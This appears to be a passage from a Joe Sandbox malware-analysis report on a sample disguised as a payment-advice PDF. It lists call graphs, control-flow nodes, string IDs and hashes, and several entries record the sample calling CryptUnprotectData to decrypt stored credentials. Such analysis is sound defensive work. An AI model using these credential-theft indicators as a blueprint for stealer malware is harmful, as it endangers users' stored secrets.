39785->39786 39790 3747d540 CryptUnprotectData 39785->39790 39791 3747d550 CryptUnprotectData 39785->39791 39800 3747d730 39785->39800 39804 3747d1ec 39786->39804 39790->39786 39791->39786 39793 3747d575 39792->39793 39794 3747d629 39792->39794 39793->39794 39797 3747d730 CryptUnprotectData 39793->39797 39798 3747d540 CryptUnprotectData 39793->39798 39799 3747d550 CryptUnprotectData 39793->39799 39795 3747d1ec CryptUnprotectData 39794->39795 39796 3747d7f5 39795->39796 39796->39781 39797->39794 39798->39794 39799->39794 39801 3747d745 39800->39801 39802 3747d1ec CryptUnprotectData 39801->39802 39803 3747d7f5 39802->39803 39803->39786 39805 3747d9e0 CryptUnprotectData 39804->39805 39806 3747d7f5 39805->39806 39806->39781 39809 37a51897 39807->39809 39810 37a52866 39809->39810 39811 37a51934 39809->39811 39813 37a5193f 39811->39813 39812 37a52e79 39814 37a52ea9 39812->39814 39816 37a52ac4 7 API calls 39812->39816 39813->39812 39818 37a52ed4 39813->39818 39821 37a53e40 39813->39821 39814->39818 39825 37a52ac4 39814->39825 39816->39814 39817 37a52ec1 39817->39818 39831 37a5d6c1 39817->39831 39818->39809 39822 37a53e61 39821->39822 39823 37a53e85 39822->39823 39837 37a53ff0 39822->39837 39823->39812 39827 37a52acf 39825->39827 39826 37a5d0a1 39826->39817 39827->39826 39828 37a50938 6 API calls 39827->39828 39829 37a5d0bb 39828->39829 39884 37a5c544 39829->39884 39836 37a5d6f1 39831->39836 39832 37a5d899 39833 37a50938 6 API calls 39832->39833 39835 37a5d77c 39833->39835 39834 37a5dad0 WaitMessage 39834->39836 39836->39832 39836->39834 39836->39835 39841 37a53ffd 39837->39841 39838 37a50938 6 API calls 39839 37a5402b 39838->39839 39842 37a54036 39839->39842 39843 37a52bec 39839->39843 39841->39838 39842->39823 39844 37a52bf7 39843->39844 39845 37a540a8 39844->39845 39847 37a52c20 39844->39847 39848 37a52c2b 39847->39848 39862 37a52c30 39848->39862 39851 37a54526 39852 37a540f8 CreateWindowExW CreateWindowExW 39851->39852 39853 37a54540 39852->39853 39854 37a54108 CreateWindowExW CreateWindowExW 39853->39854 39855 37a54547 39854->39855 39857 37a59067 CreateWindowExW CreateWindowExW 39855->39857 39858 37a591f0 CreateWindowExW CreateWindowExW 39855->39858 39859 37a58400 CreateWindowExW CreateWindowExW 39855->39859 39860 37a591d8 CreateWindowExW CreateWindowExW 39855->39860 39856 37a54551 39856->39845 39857->39856 39858->39856 39859->39856 39860->39856 39864 37a52c3b 39862->39864 39863 37a54517 39866 37a575cd 39863->39866 39864->39863 39865 37a53e40 8 API calls 39864->39865 39865->39863 39867 37a575ea 39866->39867 39868 37a57700 39867->39868 39872 37a58060 39867->39872 39876 37a5804f 39867->39876 39869 37a576d3 39873 37a5807d 39872->39873 39875 37a580c1 39873->39875 39880 37a54108 39873->39880 39875->39869 39877 37a58060 39876->39877 39878 37a54108 2 API calls 39877->39878 39879 37a580c1 39877->39879 39878->39879 39879->39869 39881 37a54113 39880->39881 39882 37a58400 CreateWindowExW CreateWindowExW 39881->39882 39883 37a5901f 39882->39883 39883->39875 39885 37a5c54f 39884->39885 39886 37a5d3bb 39885->39886 39888 37a5c560 39885->39888 39886->39826 39889 37a5d3f0 OleInitialize 39888->39889 39890 37a5d454 39889->39890 39890->39886

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 1666b8-1666ed 1 1666f3-166716 0->1 2 166b1c-166b20 0->2 11 1667c4-1667c8 1->11 12 16671c-166729 1->12 3 166b22-166b36 2->3 4 166b39-166b47 2->4 8 166bb8-166bcd 4->8 9 166b49-166b5e 4->9 18 166bd4-166be1 8->18 19 166bcf-166bd2 8->19 20 166b65-166b72 9->20 21 166b60-166b63 9->21 15 166810-166819 11->15 16 1667ca-1667d8 11->16 24 16672b-166736 12->24 25 166738 12->25 22 166c2f 15->22 23 16681f-166829 15->23 16->15 36 1667da-1667f5 16->36 26 166be3-166c1e 18->26 19->26 27 166b74-166bb5 20->27 21->27 30 166c34-166c4d 22->30 23->2 28 16682f-166838 23->28 31 16673a-16673c 24->31 25->31 70 166c25-166c2c 26->70 34 166847-166853 28->34 35 16683a-16683f 28->35 31->11 38 166742-1667a4 31->38 34->30 41 166859-16685f 34->41 35->34 54 1667f7-166801 36->54 55 166803 36->55 82 1667a6 38->82 83 1667aa-1667c1 38->83 43 166b06-166b0a 41->43 44 166865-166875 41->44 43->22 47 166b10-166b16 43->47 52 166877-166887 44->52 53 166889-16688b 44->53 47->2 47->28 59 16688e-166894 52->59 53->59 60 166805-166807 54->60 55->60 59->43 65 16689a-1668a9 59->65 60->15 66 166809 60->66 68 166957-166982 call 166500 * 2 65->68 69 1668af 65->69 66->15 86 166a6c-166a86 68->86 87 166988-16698c 68->87 72 1668b2-1668c3 69->72 72->30 75 1668c9-1668db 72->75 75->30 78 1668e1-1668fb call 166c98 75->78 81 166901-166911 78->81 81->43 85 166917-16691a 81->85 82->83 83->11 88 166924-166927 85->88 89 16691c-166922 85->89 86->2 107 166a8c-166a90 86->107 87->43 92 166992-166996 87->92 88->22 90 16692d-166930 88->90 89->88 89->90 93 166932-166936 90->93 94 166938-16693b 90->94 96 1669be-1669c4 92->96 97 166998-1669a5 92->97 93->94 98 166941-166945 93->98 94->22 94->98 99 1669c6-1669ca 96->99 100 1669ff-166a05 96->100 108 1669a7-1669b2 97->108 109 1669b4 97->109 98->22 102 16694b-166951 98->102 99->100 103 1669cc-1669d5 99->103 104 166a07-166a0b 100->104 105 166a11-166a17 100->105 102->68 102->72 112 1669d7-1669dc 103->112 113 1669e4-1669fa 103->113 104->70 104->105 110 166a23-166a25 105->110 111 166a19-166a1d 105->111 114 166a92-166a9c call 1653a8 107->114 115 166acc-166ad0 107->115 118 1669b6-1669b8 108->118 109->118 116 166a27-166a30 110->116 117 166a5a-166a5c 110->117 111->43 111->110 112->113 113->43 114->115 128 166a9e-166ab3 114->128 115->70 125 166ad6-166ada 115->125 121 166a32-166a37 116->121 122 166a3f-166a55 116->122 117->43 123 166a62-166a69 117->123 118->43 118->96 121->122 122->43 125->70 126 166ae0-166aed 125->126 131 166aef-166afa 126->131 132 166afc 126->132 128->115 137 166ab5-166aca 128->137 134 166afe-166b00 131->134 132->134 134->43 134->70 137->2 137->115
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                    • Opcode ID: 34af1c601d5dd638dbdc39b2a5684f7da8112f023738772160a86786699b5a59
                                                                                                                                    • Instruction ID: 5b11e6255d6181cdc82e79e52543bdc9b2c43c11aadd7ae905a69579c0b40b25
                                                                                                                                    • Opcode Fuzzy Hash: 34af1c601d5dd638dbdc39b2a5684f7da8112f023738772160a86786699b5a59
                                                                                                                                    • Instruction Fuzzy Hash: 3E126A30A00609DFCB14CF69D984AAEBBF2FF88314F158569E849EB261DB31ED55CB50

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 141 1619b8-161a13 145 161a35-161a84 141->145 146 161a15-161a34 141->146 150 161a86-161a8d 145->150 151 161a9f 145->151 152 161a96-161a9d 150->152 153 161a8f-161a94 150->153 154 161aa7 151->154 155 161aaa-161abe 152->155 153->155 154->155 157 161ad4-161adc 155->157 158 161ac0-161ac7 155->158 161 161ade-161ae2 157->161 159 161acd-161ad2 158->159 160 161ac9-161acb 158->160 159->161 160->161 163 161ae4-161af9 161->163 164 161b42-161b45 161->164 163->164 172 161afb-161afe 163->172 165 161b47-161b5c 164->165 166 161b8d-161b93 164->166 165->166 178 161b5e-161b62 165->178 167 16268e 166->167 168 161b99-161b9b 166->168 175 162693-162ca1 167->175 168->167 170 161ba1-161ba6 168->170 176 16263c-162640 170->176 177 161bac 170->177 173 161b00-161b02 172->173 174 161b1d-161b3b call 1602a8 172->174 173->174 179 161b04-161b07 173->179 174->164 201 162cb2-162cba 175->201 202 162ca3-162ca5 175->202 181 162647-16268d 176->181 182 162642-162645 176->182 177->176 183 161b64-161b68 178->183 184 161b6a-161b88 call 1602a8 178->184 179->164 186 161b09-161b1b 179->186 182->175 182->181 183->166 183->184 184->166 186->164 186->174 205 162cbc-162cca 201->205 203 162ca7-162ca9 202->203 204 162cab-162cb0 202->204 203->205 204->205 208 162ce0-162ce8 205->208 209 162ccc-162cce 205->209 213 162ceb-162cee 208->213 210 162cd7-162cde 209->210 211 162cd0-162cd5 209->211 210->213 211->213 214 162d05-162d09 213->214 215 162cf0-162cfe 213->215 216 162d22-162d25 214->216 217 162d0b-162d19 214->217 215->214 221 162d00 215->221 219 162d27-162d2b 216->219 220 162d2d-162d62 216->220 217->216 226 162d1b 217->226 219->220 223 162d64-162d7b 219->223 228 162dc4-162dc9 220->228 221->214 224 162d81-162d8d 223->224 225 162d7d-162d7f 223->225 229 162d97-162da1 224->229 230 162d8f-162d95 224->230 225->228 226->216 232 162da9 229->232 233 162da3 229->233 230->232 235 162db1-162dbd 232->235 233->232 235->228
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                                    • API String ID: 0-1317942629
                                                                                                                                    • Opcode ID: a1dd7ea1f249bd4671792078a6fbf9156de8ce2f2ec5b834aa9637061f361050
                                                                                                                                    • Instruction ID: 422eaf58e8ce02b9b9fe06eff4f2d5936a37c4b734015352dc08499b8af20e4f
                                                                                                                                    • Opcode Fuzzy Hash: a1dd7ea1f249bd4671792078a6fbf9156de8ce2f2ec5b834aa9637061f361050
                                                                                                                                    • Instruction Fuzzy Hash: 61725E2960D3D29FDB224F305CFB595BFE09E4314576D0ADEE0C1660A3DA6A87A9C313

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 320 165f90-165fc6 450 165fc8 call 165f90 320->450 451 165fc8 call 1660e0 320->451 452 165fc8 call 165968 320->452 321 165fce-165fd4 322 165fd6-165fda 321->322 323 166024-166028 321->323 324 165fdc-165fe1 322->324 325 165fe9-165ff0 322->325 326 16603f-166053 323->326 327 16602a-166039 323->327 324->325 329 1660c6-166103 325->329 330 165ff6-165ffd 325->330 328 16605b-166062 326->328 448 166055 call 168da0 326->448 449 166055 call 1690a8 326->449 331 166065-16606f 327->331 332 16603b-16603d 327->332 341 166105-16610b 329->341 342 16610e-16612e 329->342 330->323 335 165fff-166003 330->335 333 166071-166077 331->333 334 166079-16607d 331->334 332->328 337 166085-1660bf 333->337 334->337 338 16607f 334->338 339 166005-16600a 335->339 340 166012-166019 335->340 337->329 338->337 339->340 340->329 343 16601f-166022 340->343 341->342 348 166135-16613c 342->348 349 166130 342->349 343->328 352 16613e-166149 348->352 351 1664c4-1664cd 349->351 353 1664d5-166511 352->353 354 16614f-166162 352->354 363 166513-166518 353->363 364 16651a-16651e 353->364 359 166164-166172 354->359 360 166178-166193 354->360 359->360 366 16644c-166453 359->366 368 1661b7-1661ba 360->368 369 166195-16619b 360->369 367 166524-166525 363->367 364->367 366->351 372 166455-166457 366->372 373 166314-16631a 368->373 374 1661c0-1661c3 368->374 370 1661a4-1661a7 369->370 371 16619d 369->371 376 1661da-1661e0 370->376 377 1661a9-1661ac 370->377 371->370 371->373 375 166406-166409 371->375 371->376 378 166466-16646c 372->378 379 166459-16645e 372->379 373->375 380 166320-166325 373->380 374->373 381 1661c9-1661cf 374->381 382 1664d0 375->382 383 16640f-166415 375->383 384 1661e6-1661e8 376->384 385 1661e2-1661e4 376->385 386 166246-16624c 377->386 387 1661b2 377->387 378->353 388 16646e-166473 378->388 379->378 380->375 381->373 389 1661d5 381->389 382->353 391 166417-16641f 383->391 392 16643a-16643e 383->392 393 1661f2-1661fb 384->393 385->393 386->375 390 166252-166258 386->390 387->375 394 166475-16647a 388->394 395 1664b8-1664bb 388->395 389->375 396 16625e-166260 390->396 397 16625a-16625c 390->397 391->353 398 166425-166434 391->398 392->366 401 166440-166446 392->401 399 16620e-166236 393->399 400 1661fd-166208 393->400 394->382 403 16647c 394->403 395->382 402 1664bd-1664c2 395->402 405 16626a-166281 396->405 397->405 398->360 398->392 423 16623c-166241 399->423 424 16632a-166360 399->424 400->375 400->399 401->352 401->366 402->351 402->372 404 166483-166488 403->404 406 1664aa-1664ac 404->406 407 16648a-16648c 404->407 416 166283-16629c 405->416 417 1662ac-1662d3 405->417 406->382 414 1664ae-1664b1 406->414 411 16648e-166493 407->411 412 16649b-1664a1 407->412 411->412 412->353 415 1664a3-1664a8 412->415 414->395 415->406 419 16647e-166481 415->419 416->424 429 1662a2-1662a7 416->429 417->382 428 1662d9-1662dc 417->428 419->382 419->404 423->424 430 166362-166366 424->430 431 16636d-166375 424->431 428->382 432 1662e2-16630b 428->432 429->424 433 166385-166389 430->433 434 166368-16636b 430->434 431->382 435 16637b-166380 431->435 432->424 447 16630d-166312 432->447 436 16638b-166391 433->436 437 1663a8-1663ac 433->437 434->431 434->433 435->375 436->437 439 166393-16639b 436->439 440 1663b6-1663d5 call 1666b8 437->440 441 1663ae-1663b4 437->441 439->382 442 1663a1-1663a6 439->442 444 1663db-1663df 440->444 441->440 441->444 442->375 444->375 445 1663e1-1663fd 444->445 445->375 447->424 448->328 449->328 450->321 451->321 452->321
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                    • API String ID: 0-2525668591
                                                                                                                                    • Opcode ID: 6cec26b0b1c2e2a21dda1d25dc3eed702e6f098636c152a218344a7cbc245aad
                                                                                                                                    • Instruction ID: 4c21968f3baa2b9a916c0db4108fbb4455d2a7e40e6eaea616e7dda556b32678
                                                                                                                                    • Opcode Fuzzy Hash: 6cec26b0b1c2e2a21dda1d25dc3eed702e6f098636c152a218344a7cbc245aad
                                                                                                                                    • Instruction Fuzzy Hash: 0B124C31A00219DFCB14CFA9DD94AAEBBF2FF89314F158069E815AB261DB30DD65CB50

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 538 164328-164368 540 16436f-16444c call 163168 call 162c88 538->540 541 16436a 538->541 551 164453-164471 540->551 552 16444e 540->552 541->540 582 164474 call 164664 551->582 583 164474 call 164620 551->583 552->551 553 16447a-164485 554 164487 553->554 555 16448c-164490 553->555 554->555 556 164495-16449c 555->556 557 164492-164493 555->557 559 1644a3-1644b1 556->559 560 16449e 556->560 558 1644b4-1644f8 557->558 564 16455e-164575 558->564 559->558 560->559 566 164577-16459c 564->566 567 1644fa-164510 564->567 573 1645b4 566->573 574 16459e-1645b3 566->574 571 164512-16451e 567->571 572 16453a 567->572 575 164520-164526 571->575 576 164528-16452e 571->576 577 164540-16455d 572->577 574->573 578 164538 575->578 576->578 577->564 578->577 582->553 583->553
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                    • API String ID: 0-1454975990
                                                                                                                                    • Opcode ID: dce691e31660a1aa28f38b05477c0870e8781965bfc633bda775ec528ee99080
                                                                                                                                    • Instruction ID: d06fa608e4c355ac726a5c4ee43b470427973fc63c7287e8c33540a8c418b72f
                                                                                                                                    • Opcode Fuzzy Hash: dce691e31660a1aa28f38b05477c0870e8781965bfc633bda775ec528ee99080
                                                                                                                                    • Instruction Fuzzy Hash: 7491D574E00218DFDB18DFAAD884A9DBBF2BF89300F14C169E409AB365DB349945CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                    • Opcode ID: b4f8bf96c4bd231d9960481fad356060b3d80d530a5e9c9fc4f8d394298e291c
                                                                                                                                    • Instruction ID: c67c948144de9a39feaa8a92dc8fa79165565df60b5928bb63e30c214589398c
                                                                                                                                    • Opcode Fuzzy Hash: b4f8bf96c4bd231d9960481fad356060b3d80d530a5e9c9fc4f8d394298e291c
                                                                                                                                    • Instruction Fuzzy Hash: 86A27F71A04209DFCB15CFA8C994AAEBBF6BF88310F158569E405DB361DB31ED91CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1263 37a5e7c8-37a5e7f3 1264 37a5e7f5 1263->1264 1265 37a5e7fa-37a5e85a 1263->1265 1264->1265 1267 37a5e860-37a5e971 1265->1267 1268 37a5eb8d-37a5ebb5 1265->1268 1310 37a5e973-37a5e97f 1267->1310 1311 37a5e99b 1267->1311 1271 37a5f340-37a5f368 1268->1271 1272 37a5ebbb-37a5ebe8 1268->1272 1277 37a5f601 1271->1277 1278 37a5f36e-37a5f545 1271->1278 1279 37a5eee6-37a5f251 1272->1279 1280 37a5ebee-37a5edf2 1272->1280 1281 37a5f602-37a5f609 1277->1281 1439 37a5f54b call 16324d 1278->1439 1440 37a5f54b call 163168 1278->1440 1424 37a5f253-37a5f268 1279->1424 1425 37a5f26a-37a5f27b 1279->1425 1379 37a5edf4-37a5ee09 1280->1379 1380 37a5ee0b-37a5ee1c 1280->1380 1312 37a5e981-37a5e987 1310->1312 1313 37a5e989-37a5e98f 1310->1313 1317 37a5e9a1-37a5eb43 1311->1317 1318 37a5e999 1312->1318 1313->1318 1392 37a5eb45-37a5eb51 1317->1392 1393 37a5eb52-37a5eb53 1317->1393 1318->1317 1386 37a5ee1d-37a5eee1 1379->1386 1380->1386 1383 37a5f550-37a5f5cf call 3752cc28 1404 37a5f5d4-37a5f5d6 1383->1404 1416 37a5f33f 1386->1416 1392->1393 1393->1268 1404->1281 1416->1271 1428 37a5f27c-37a5f33e 1424->1428 1425->1428 1428->1416 1439->1383 1440->1383
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te^q$(y4
                                                                                                                                    • API String ID: 0-104613788
                                                                                                                                    • Opcode ID: 57ac5d4c51caf0ca87c4fbc5e5f60cec9785feec0043b81cb1b95c795fb67470
                                                                                                                                    • Instruction ID: 940e9f4d6b5ee2a3a9dea6bfcf34811b7a23b090444065d01b9edfcf2b07da4c
                                                                                                                                    • Opcode Fuzzy Hash: 57ac5d4c51caf0ca87c4fbc5e5f60cec9785feec0043b81cb1b95c795fb67470
                                                                                                                                    • Instruction Fuzzy Hash: AC82B274A00228CFDB25DF65D994BADB7B2FB89301F1085E9D909A7364DB319E82CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te^q$(y4
                                                                                                                                    • API String ID: 0-104613788
                                                                                                                                    • Opcode ID: ccd9b2d35b6d5d7d43341e0e81afc380b6ec33d7b54fa763a681a3704913e35e
                                                                                                                                    • Instruction ID: 5c0e72e1392b7acf69f8ac2a837429c989cc573aab892f7a9fe982c28297c7c8
                                                                                                                                    • Opcode Fuzzy Hash: ccd9b2d35b6d5d7d43341e0e81afc380b6ec33d7b54fa763a681a3704913e35e
                                                                                                                                    • Instruction Fuzzy Hash: B772C278A00218CFDB25DF65D994BA9B7B2FB89300F1085E9D809B7364CB319E82DF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$Hbq
                                                                                                                                    • API String ID: 0-662517225
                                                                                                                                    • Opcode ID: 19343db53a6985383de9f6280b665ed295a0d6afcf09f5e4a10044b824480a22
                                                                                                                                    • Instruction ID: 8fe71031df084263905432171ba29d6c6bf71e1a8a39609da947c7aedccb0e7d
                                                                                                                                    • Opcode Fuzzy Hash: 19343db53a6985383de9f6280b665ed295a0d6afcf09f5e4a10044b824480a22
                                                                                                                                    • Instruction Fuzzy Hash: AD125D70A006199FDB14DFA9C894AAEBBF6FF88300F248569E545DB3A1DF309D51CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3aa583321385bc256edf668bfcd157a7fc236234148f94b670ab965b7297be78
                                                                                                                                    • Instruction ID: c7a618d5746fe8151717fcaef5288875be583dff1ae981b8ec18e48ecb7472ff
                                                                                                                                    • Opcode Fuzzy Hash: 3aa583321385bc256edf668bfcd157a7fc236234148f94b670ab965b7297be78
                                                                                                                                    • Instruction Fuzzy Hash: 17D17A74A00309DFEB04DFA5C888B9DBBF2BF84324F158558E864AB265DB74E945CF81
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(00000051,?,00000000,?,?,?,?), ref: 3747DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: 47c2c57f843c624253db5254f26a9741aadb68fe7f1438f4639b92b19031ab9e
                                                                                                                                    • Instruction ID: 3495955afae0d1c0ae6d88081cfb7db35273dca8cbe25d70280e2ce5296331df
                                                                                                                                    • Opcode Fuzzy Hash: 47c2c57f843c624253db5254f26a9741aadb68fe7f1438f4639b92b19031ab9e
                                                                                                                                    • Instruction Fuzzy Hash: B81179B6800249DFCB10CF99C804BDEBFF5EF48320F108419EA54A7211C339A590CFA5
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(00000051,?,00000000,?,?,?,?), ref: 3747DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: d1dde5d364c7185e6cc9604742e215e4aca0b009cb6a509c76aeeaf6c2f51a1e
                                                                                                                                    • Instruction ID: 135797d597bfec6c3c24cb12a10ca440723b99e4290e219ef0fbf057d0843281
                                                                                                                                    • Opcode Fuzzy Hash: d1dde5d364c7185e6cc9604742e215e4aca0b009cb6a509c76aeeaf6c2f51a1e
                                                                                                                                    • Instruction Fuzzy Hash: 881147B6800249AFDB10CF99C405BDEBFF4EF48320F108419E558A7211C335A550CFA5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: 08b06e6a31576461c8c8a39ef8188cb6089b6f6a17c4a9ea7df405f84745ac63
                                                                                                                                    • Instruction ID: 828728d8641ac18cd2ad6ff65727c98057f6d58f179c2cb634635d790bbf259e
                                                                                                                                    • Opcode Fuzzy Hash: 08b06e6a31576461c8c8a39ef8188cb6089b6f6a17c4a9ea7df405f84745ac63
                                                                                                                                    • Instruction Fuzzy Hash: 66A180B5E012188FEB58CF6AD984B9DBBF2AF89300F14C0AAD408B7255DB745A85CF51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: 71ec827256ff34645315cdfcc4c79039f0af93a7b0c5bfd5216badda0be39d53
                                                                                                                                    • Instruction ID: e7076ca4d47a80fbb12c3a2ffa548c2e9cf7c59c0fff7f5b661e2e1dd6646e05
                                                                                                                                    • Opcode Fuzzy Hash: 71ec827256ff34645315cdfcc4c79039f0af93a7b0c5bfd5216badda0be39d53
                                                                                                                                    • Instruction Fuzzy Hash: B2A18375E012188FEB18CF6AC984B9EFBF2AF89300F14D0AAD408B7255DB345A85CF51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: d356d14a7a916fa3b68be373c03108fe22feb830df6ecb57abf5e9c09aa35203
                                                                                                                                    • Instruction ID: 3af0405b5d3363a2256efb03cfd4b594b22792f2a8659575f4f6d7612ccb7c0f
                                                                                                                                    • Opcode Fuzzy Hash: d356d14a7a916fa3b68be373c03108fe22feb830df6ecb57abf5e9c09aa35203
                                                                                                                                    • Instruction Fuzzy Hash: 3BA180B5E012188FEB68CF6AC944B9DFBF2AF89310F14D0AAD408B7255DB345A85CF11
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
